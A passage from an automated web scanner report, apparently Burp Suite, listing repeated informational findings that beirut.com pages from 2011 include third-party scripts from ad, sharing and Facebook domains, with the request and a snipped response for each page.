Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:47:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.630. http://www.beirut.com/Recreations/Yoga-Centers/03053122

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Yoga-Centers/03053122

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Yoga-Centers/03053122 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:52:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.631. http://www.beirut.com/Restaurants/Bakeries/6807482759

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Bakeries/6807482759

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Bakeries/6807482759 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:00:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.632. http://www.beirut.com/Restaurants/Cafes/318727173

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Cafes/318727173

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Cafes/318727173 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:59:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.633. http://www.beirut.com/Restaurants/Caterers/7413291663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Caterers/7413291663

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Caterers/7413291663 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:16:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.634. http://www.beirut.com/Restaurants/Dining/314749128

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Dining/314749128

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Dining/314749128 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:56:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.635. http://www.beirut.com/Restaurants/Health-and-Diet-Shops/34430696

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Health-and-Diet-Shops/34430696

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Health-and-Diet-Shops/34430696 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:00:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.636. http://www.beirut.com/Restaurants/Ice-Cream-and-Sweets/2144072380

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Ice-Cream-and-Sweets/2144072380

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Ice-Cream-and-Sweets/2144072380 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:03:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.637. http://www.beirut.com/Restaurants/Juice-Stalls/528624339

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Juice-Stalls/528624339

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Juice-Stalls/528624339 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:13:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.638. http://www.beirut.com/Restaurants/Take-Away/646084613

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Take-Away/646084613

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Take-Away/646084613 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:55:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.639. http://www.beirut.com/Restaurants/Winery/0312375197

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Winery/0312375197

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Winery/0312375197 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:55:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.640. http://www.beirut.com/Shopping/Books-Music-Movies/05084418

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Books-Music-Movies/05084418 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:05:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.641. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Books-Music-Movies/05084418/Bookshops/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
